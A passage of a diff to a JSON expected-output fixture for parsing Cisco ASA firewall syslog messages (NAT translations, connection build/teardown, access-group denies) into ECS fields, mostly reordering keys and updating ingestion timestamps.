inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", @@ -16446,25 +16443,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16474,12 +16468,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995975800Z", + "ingested": "2021-12-14T14:38:25.938997966Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", @@ -16493,25 +16490,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16521,12 +16515,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995981100Z", + "ingested": "2021-12-14T14:38:25.938998715Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", @@ -16540,25 +16537,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16568,12 +16562,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995987300Z", + "ingested": "2021-12-14T14:38:25.938999420Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", @@ -16587,25 +16584,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16615,12 +16609,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995993700Z", + "ingested": "2021-12-14T14:38:25.939000214Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", @@ -16634,25 +16631,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16662,12 +16656,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995999900Z", + "ingested": "2021-12-14T14:38:25.939000884Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", @@ -16681,7 +16678,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16742,7 +16742,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996006200Z", + "ingested": "2021-12-14T14:38:25.939001594Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", @@ -16821,7 +16821,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996012300Z", + "ingested": "2021-12-14T14:38:25.939002437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", @@ -16846,22 +16846,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16871,12 +16865,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996018600Z", + "ingested": "2021-12-14T14:38:25.939003422Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", @@ -16890,25 +16887,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16918,12 +16912,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996024800Z", + "ingested": "2021-12-14T14:38:25.939004183Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", @@ -16937,7 +16934,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16999,7 +16999,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996031Z", + "ingested": "2021-12-14T14:38:25.939004877Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -17083,7 +17083,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996037300Z", + "ingested": "2021-12-14T14:38:25.939005641Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17168,7 +17168,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.996043600Z", + "ingested": "2021-12-14T14:38:25.939006272Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", @@ -17252,7 +17252,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.996050200Z", + "ingested": "2021-12-14T14:38:25.939007122Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -17334,7 +17334,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996056400Z", + "ingested": "2021-12-14T14:38:25.939007634Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", @@ -17413,7 +17413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996062600Z", + "ingested": "2021-12-14T14:38:25.939008106Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", 
@@ -17438,22 +17438,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17463,12 +17457,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996068900Z", + "ingested": "2021-12-14T14:38:25.939008579Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", @@ -17482,25 +17479,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17510,12 +17504,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996075100Z", + "ingested": "2021-12-14T14:38:25.939009059Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17529,25 +17526,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17557,12 +17551,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996079800Z", + "ingested": "2021-12-14T14:38:25.939009545Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", @@ -17576,25 +17573,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17604,12 +17598,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996084800Z", + "ingested": "2021-12-14T14:38:25.939010126Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17623,25 +17620,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17651,12 +17645,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996090600Z", + "ingested": "2021-12-14T14:38:25.939010680Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", @@ -17670,25 +17667,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17698,12 +17692,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996096Z", + "ingested": "2021-12-14T14:38:25.939011187Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17717,25 +17714,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17745,12 +17739,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996100400Z", + "ingested": "2021-12-14T14:38:25.939011649Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", @@ -17764,7 +17761,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -17828,7 +17828,7 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.996105400Z", + "ingested": "2021-12-14T14:38:25.939012117Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", @@ -17910,7 +17910,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996111700Z", + "ingested": "2021-12-14T14:38:25.939012581Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -17991,7 +17991,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996116300Z", + "ingested": "2021-12-14T14:38:25.939013108Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +18072,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996120900Z", + "ingested": "2021-12-14T14:38:25.939013665Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +18153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996125100Z", + "ingested": "2021-12-14T14:38:25.939014136Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +18232,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.996129900Z", + "ingested": "2021-12-14T14:38:25.939014594Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18315,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996136300Z", + "ingested": "2021-12-14T14:38:25.939015081Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18396,7 +18396,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996142600Z", + "ingested": "2021-12-14T14:38:25.939015543Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18477,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996148800Z", + "ingested": "2021-12-14T14:38:25.939016231Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18558,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996155300Z", + "ingested": "2021-12-14T14:38:25.939016697Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18639,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996161500Z", + "ingested": "2021-12-14T14:38:25.939017153Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18720,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996167700Z", + "ingested": "2021-12-14T14:38:25.939017622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18801,7 +18801,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996175600Z", + "ingested": "2021-12-14T14:38:25.939018232Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18882,7 +18882,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996182Z", + "ingested": "2021-12-14T14:38:25.939018695Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18963,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996188300Z", + "ingested": "2021-12-14T14:38:25.939019458Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +19044,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996194600Z", + "ingested": "2021-12-14T14:38:25.939019940Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19125,7 +19125,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996201300Z", + "ingested": "2021-12-14T14:38:25.939020752Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19206,7 +19206,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996207600Z", + "ingested": "2021-12-14T14:38:25.939021323Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19287,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996215200Z", + "ingested": "2021-12-14T14:38:25.939021901Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19368,7 +19368,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996221700Z", + "ingested": "2021-12-14T14:38:25.939022363Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19449,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996227100Z", + "ingested": "2021-12-14T14:38:25.939022916Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19530,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996232200Z", + "ingested": "2021-12-14T14:38:25.939023492Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19611,7 +19611,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996238400Z", + "ingested": "2021-12-14T14:38:25.939023954Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19692,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996244800Z", + "ingested": "2021-12-14T14:38:25.939024517Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19773,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996249400Z", + "ingested": "2021-12-14T14:38:25.939025114Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19854,7 +19854,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996254700Z", + "ingested": "2021-12-14T14:38:25.939025812Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19935,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996260900Z", + "ingested": "2021-12-14T14:38:25.939026351Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20016,7 +20016,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996266Z", + "ingested": "2021-12-14T14:38:25.939026903Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +20097,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996271Z", + "ingested": "2021-12-14T14:38:25.939027391Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +20178,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996277100Z", + "ingested": "2021-12-14T14:38:25.939027893Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20259,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996281800Z", + "ingested": "2021-12-14T14:38:25.939028373Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20340,7 +20340,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996286800Z", + "ingested": "2021-12-14T14:38:25.939028832Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -20421,7 +20421,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996293300Z", + "ingested": "2021-12-14T14:38:25.939029294Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20502,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996299500Z", + "ingested": "2021-12-14T14:38:25.939029759Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20583,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.996305800Z", + "ingested": "2021-12-14T14:38:25.939030246Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group 